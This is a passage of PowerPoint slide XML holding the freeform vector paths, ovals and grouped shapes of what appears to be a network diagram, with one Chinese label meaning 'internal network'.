                      <a:pt x="65" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="125" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="128" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="144" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="154" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="164" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="171" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="180" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="188" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="197" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="207" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="224" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="245" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="269" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="281" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="288" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="296" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="303" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="312" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="322" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="329" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="339" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="346" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="356" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="360" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="370" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="372" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="380" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="384" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="384" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="387" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="387" y="145"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="387" y="156"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="387" y="167"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="387" y="178"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="387" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="392" y="200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="392" y="211"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="392" y="223"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="392" y="234"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="389" y="245"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="380" y="256"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="370" y="264"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="360" y="267"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="353" y="275"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="344" y="278"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="334" y="281"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="327" y="289"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="317" y="295"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="310" y="295"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="298" y="298"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="286" y="298"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="279" y="298"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="267" y="298"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="298"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="250" y="298"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="240" y="298"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="231" y="298"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="224" y="298"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="214" y="298"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="207" y="298"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="197" y="298"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="188" y="298"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="180" y="298"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="171" y="298"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="164" y="298"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="298"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="298"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="135" y="298"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="125" y="298"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="298"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="298"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="289"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="286"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="281"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="278"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="275"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="267"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="261"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="248"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="245"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="234"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="223"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="211"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="186"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="170"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="159"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="148"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="6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16" name="Freeform 1065"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4226" y="1908"/>
                <a:ext cx="62" cy="86"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 2 w 62"/>
                  <a:gd name="T1" fmla="*/ 50 h 86"/>
                  <a:gd name="T2" fmla="*/ 0 w 62"/>
                  <a:gd name="T3" fmla="*/ 39 h 86"/>
                  <a:gd name="T4" fmla="*/ 0 w 62"/>
                  <a:gd name="T5" fmla="*/ 28 h 86"/>
                  <a:gd name="T6" fmla="*/ 9 w 62"/>
                  <a:gd name="T7" fmla="*/ 19 h 86"/>
                  <a:gd name="T8" fmla="*/ 17 w 62"/>
                  <a:gd name="T9" fmla="*/ 11 h 86"/>
                  <a:gd name="T10" fmla="*/ 26 w 62"/>
                  <a:gd name="T11" fmla="*/ 0 h 86"/>
                  <a:gd name="T12" fmla="*/ 33 w 62"/>
                  <a:gd name="T13" fmla="*/ 0 h 86"/>
                  <a:gd name="T14" fmla="*/ 43 w 62"/>
                  <a:gd name="T15" fmla="*/ 0 h 86"/>
                  <a:gd name="T16" fmla="*/ 45 w 62"/>
                  <a:gd name="T17" fmla="*/ 11 h 86"/>
                  <a:gd name="T18" fmla="*/ 50 w 62"/>
                  <a:gd name="T19" fmla="*/ 25 h 86"/>
                  <a:gd name="T20" fmla="*/ 57 w 62"/>
                  <a:gd name="T21" fmla="*/ 36 h 86"/>
                  <a:gd name="T22" fmla="*/ 60 w 62"/>
                  <a:gd name="T23" fmla="*/ 47 h 86"/>
                  <a:gd name="T24" fmla="*/ 62 w 62"/>
                  <a:gd name="T25" fmla="*/ 58 h 86"/>
                  <a:gd name="T26" fmla="*/ 62 w 62"/>
                  <a:gd name="T27" fmla="*/ 70 h 86"/>
                  <a:gd name="T28" fmla="*/ 62 w 62"/>
                  <a:gd name="T29" fmla="*/ 81 h 86"/>
                  <a:gd name="T30" fmla="*/ 53 w 62"/>
                  <a:gd name="T31" fmla="*/ 86 h 86"/>
                  <a:gd name="T32" fmla="*/ 45 w 62"/>
                  <a:gd name="T33" fmla="*/ 86 h 86"/>
                  <a:gd name="T34" fmla="*/ 38 w 62"/>
                  <a:gd name="T35" fmla="*/ 86 h 86"/>
                  <a:gd name="T36" fmla="*/ 29 w 62"/>
                  <a:gd name="T37" fmla="*/ 86 h 86"/>
                  <a:gd name="T38" fmla="*/ 19 w 62"/>
                  <a:gd name="T39" fmla="*/ 83 h 86"/>
                  <a:gd name="T40" fmla="*/ 12 w 62"/>
                  <a:gd name="T41" fmla="*/ 75 h 86"/>
                  <a:gd name="T42" fmla="*/ 7 w 62"/>
                  <a:gd name="T43" fmla="*/ 64 h 86"/>
                  <a:gd name="T44" fmla="*/ 2 w 62"/>
                  <a:gd name="T45" fmla="*/ 53 h 86"/>
                  <a:gd name="T46" fmla="*/ 2 w 62"/>
                  <a:gd name="T47" fmla="*/ 50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86"/>
                  <a:gd name="T74" fmla="*/ 62 w 62"/>
                  <a:gd name="T75" fmla="*/ 86 h 8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86">
                    <a:moveTo>
                      <a:pt x="2" y="50"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="5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17" name="Freeform 1066"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4372" y="1886"/>
                <a:ext cx="43" cy="64"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 43"/>
                  <a:gd name="T1" fmla="*/ 0 h 64"/>
                  <a:gd name="T2" fmla="*/ 10 w 43"/>
                  <a:gd name="T3" fmla="*/ 8 h 64"/>
                  <a:gd name="T4" fmla="*/ 19 w 43"/>
                  <a:gd name="T5" fmla="*/ 16 h 64"/>
                  <a:gd name="T6" fmla="*/ 27 w 43"/>
                  <a:gd name="T7" fmla="*/ 16 h 64"/>
                  <a:gd name="T8" fmla="*/ 36 w 43"/>
                  <a:gd name="T9" fmla="*/ 22 h 64"/>
                  <a:gd name="T10" fmla="*/ 41 w 43"/>
                  <a:gd name="T11" fmla="*/ 36 h 64"/>
                  <a:gd name="T12" fmla="*/ 43 w 43"/>
                  <a:gd name="T13" fmla="*/ 47 h 64"/>
                  <a:gd name="T14" fmla="*/ 43 w 43"/>
                  <a:gd name="T15" fmla="*/ 55 h 64"/>
                  <a:gd name="T16" fmla="*/ 36 w 43"/>
                  <a:gd name="T17" fmla="*/ 64 h 64"/>
                  <a:gd name="T18" fmla="*/ 27 w 43"/>
                  <a:gd name="T19" fmla="*/ 64 h 64"/>
                  <a:gd name="T20" fmla="*/ 15 w 43"/>
                  <a:gd name="T21" fmla="*/ 61 h 64"/>
                  <a:gd name="T22" fmla="*/ 7 w 43"/>
                  <a:gd name="T23" fmla="*/ 53 h 64"/>
                  <a:gd name="T24" fmla="*/ 5 w 43"/>
                  <a:gd name="T25" fmla="*/ 41 h 64"/>
                  <a:gd name="T26" fmla="*/ 0 w 43"/>
                  <a:gd name="T27" fmla="*/ 30 h 64"/>
                  <a:gd name="T28" fmla="*/ 0 w 43"/>
                  <a:gd name="T29" fmla="*/ 19 h 64"/>
                  <a:gd name="T30" fmla="*/ 7 w 43"/>
                  <a:gd name="T31" fmla="*/ 8 h 64"/>
                  <a:gd name="T32" fmla="*/ 0 w 43"/>
                  <a:gd name="T33" fmla="*/ 0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64"/>
                  <a:gd name="T53" fmla="*/ 43 w 43"/>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64">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="10" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="8"/>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6405" name="Rectangle 1067"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4163" y="1964"/>
              <a:ext cx="353"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406" name="Rectangle 1068"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4214" y="2016"/>
              <a:ext cx="284"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宋体" pitchFamily="2" charset="-122"/>
                </a:rPr>
                <a:t>内部网络</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="56325" name="Group 1069"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="4419600" y="2438400"/>
            <a:ext cx="452438" cy="349250"/>
            <a:chOff x="3516" y="1854"/>
            <a:chExt cx="285" cy="220"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="56379" name="Oval 1070"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3517" y="1945"/>
              <a:ext cx="284" cy="129"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="0078AA"/>
            </a:solidFill>
            <a:ln w="3175">
              <a:solidFill>
                <a:srgbClr val="AAE6FF"/>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80" name="Rectangle 1071"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3516" y="1919"/>
              <a:ext cx="284" cy="92"/>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81" name="Rectangle 1072"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3516" y="1919"/>
              <a:ext cx="284" cy="92"/>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82" name="Oval 1073"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3517" y="1854"/>
              <a:ext cx="284" cy="128"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="00B4FF"/>
            </a:solidFill>
            <a:ln w="3175">
              <a:solidFill>
                <a:srgbClr val="AAE6FF"/>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nvGrpSpPr>
            <p:cNvPr id="56383" name="Group 1074"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="3559" y="1869"/>
              <a:ext cx="198" cy="98"/>
              <a:chOff x="3559" y="1869"/>
              <a:chExt cx="198" cy="98"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="56386" name="Group 1075"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="3559" y="1869"/>
                <a:ext cx="196" cy="96"/>
                <a:chOff x="3559" y="1869"/>
                <a:chExt cx="196" cy="96"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="56396" name="Freeform 1076"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="3662" y="1871"/>
                  <a:ext cx="93" cy="41"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 93"/>
                    <a:gd name="T1" fmla="*/ 32 h 41"/>
                    <a:gd name="T2" fmla="*/ 20 w 93"/>
                    <a:gd name="T3" fmla="*/ 41 h 41"/>
                    <a:gd name="T4" fmla="*/ 71 w 93"/>
                    <a:gd name="T5" fmla="*/ 14 h 41"/>
                    <a:gd name="T6" fmla="*/ 93 w 93"/>
                    <a:gd name="T7" fmla="*/ 23 h 41"/>
                    <a:gd name="T8" fmla="*/ 81 w 93"/>
                    <a:gd name="T9" fmla="*/ 0 h 41"/>
                    <a:gd name="T10" fmla="*/ 22 w 93"/>
                    <a:gd name="T11" fmla="*/ 0 h 41"/>
                    <a:gd name="T12" fmla="*/ 46 w 93"/>
                    <a:gd name="T13" fmla="*/ 7 h 41"/>
                    <a:gd name="T14" fmla="*/ 0 w 93"/>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3"/>
                    <a:gd name="T25" fmla="*/ 0 h 41"/>
                    <a:gd name="T26" fmla="*/ 93 w 9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 h="41">
                      <a:moveTo>
                        <a:pt x="0" y="32"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="20" y="41"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="71" y="14"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="93" y="23"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="81" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="22" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="46"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7" name="Freeform 1077"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="3662" y="1871"/>
                  <a:ext cx="93" cy="41"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 93"/>
                    <a:gd name="T1" fmla="*/ 32 h 41"/>
                    <a:gd name="T2" fmla="*/ 20 w 93"/>
                    <a:gd name="T3" fmla="*/ 41 h 41"/>
                    <a:gd name="T4" fmla="*/ 71 w 93"/>
                    <a:gd name="T5" fmla="*/ 14 h 41"/>
                    <a:gd name="T6" fmla="*/ 93 w 93"/>
                    <a:gd name="T7" fmla="*/ 23 h 41"/>
                    <a:gd name="T8" fmla="*/ 81 w 93"/>
                    <a:gd name="T9" fmla="*/ 0 h 41"/>
                    <a:gd name="T10" fmla="*/ 22 w 93"/>
                    <a:gd name="T11" fmla="*/ 0 h 41"/>
                    <a:gd name="T12" fmla="*/ 46 w 93"/>
                    <a:gd name="T13" fmla="*/ 7 h 41"/>
                    <a:gd name="T14" fmla="*/ 0 w 93"/>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3"/>
                    <a:gd name="T25" fmla="*/ 0 h 41"/>
                    <a:gd name="T26" fmla="*/ 93 w 9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 h="41">
                      <a:moveTo>
                        <a:pt x="0" y="32"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="20" y="41"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="71" y="14"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="93" y="23"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="81" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="22" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="46" y="7"/>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8" name="Freeform 1078"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="3559" y="1919"/>
                  <a:ext cx="94" cy="44"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 94 w 94"/>
                    <a:gd name="T1" fmla="*/ 9 h 44"/>
                    <a:gd name="T2" fmla="*/ 73 w 94"/>
                    <a:gd name="T3" fmla="*/ 0 h 44"/>
                    <a:gd name="T4" fmla="*/ 25 w 94"/>
                    <a:gd name="T5" fmla="*/ 27 h 44"/>
                    <a:gd name="T6" fmla="*/ 0 w 94"/>
                    <a:gd name="T7" fmla="*/ 18 h 44"/>
                    <a:gd name="T8" fmla="*/ 13 w 94"/>
                    <a:gd name="T9" fmla="*/ 44 h 44"/>
                    <a:gd name="T10" fmla="*/ 73 w 94"/>
                    <a:gd name="T11" fmla="*/ 44 h 44"/>
                    <a:gd name="T12" fmla="*/ 47 w 94"/>
                    <a:gd name="T13" fmla="*/ 34 h 44"/>
                    <a:gd name="T14" fmla="*/ 94 w 9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4"/>
                    <a:gd name="T26" fmla="*/ 94 w 9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4">
                      <a:moveTo>
                        <a:pt x="94" y="9"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="73" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="25" y="27"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="18"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="13" y="44"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="73" y="44"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="47" y="34"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="9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9" name="Freeform 1079"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="3559" y="1919"/>
                  <a:ext cx="94" cy="44"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 94 w 94"/>
                    <a:gd name="T1" fmla="*/ 9 h 44"/>
                    <a:gd name="T2" fmla="*/ 73 w 94"/>
                    <a:gd name="T3" fmla="*/ 0 h 44"/>
                    <a:gd name="T4" fmla="*/ 25 w 94"/>
                    <a:gd name="T5" fmla="*/ 27 h 44"/>
                    <a:gd name="T6" fmla="*/ 0 w 94"/>
                    <a:gd name="T7" fmla="*/ 18 h 44"/>
                    <a:gd name="T8" fmla="*/ 13 w 94"/>
                    <a:gd name="T9" fmla="*/ 44 h 44"/>
                    <a:gd name="T10" fmla="*/ 73 w 94"/>
                    <a:gd name="T11" fmla="*/ 44 h 44"/>
                    <a:gd name="T12" fmla="*/ 47 w 94"/>
                    <a:gd name="T13" fmla="*/ 34 h 44"/>
                    <a:gd name="T14" fmla="*/ 94 w 9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4"/>
                    <a:gd name="T26" fmla="*/ 94 w 9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4">
                      <a:moveTo>
                        <a:pt x="94" y="9"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="73" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="25" y="27"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="18"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="13" y="44"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="73" y="44"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="47" y="34"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="94"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00" name="Freeform 1080"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="3565" y="1869"/>
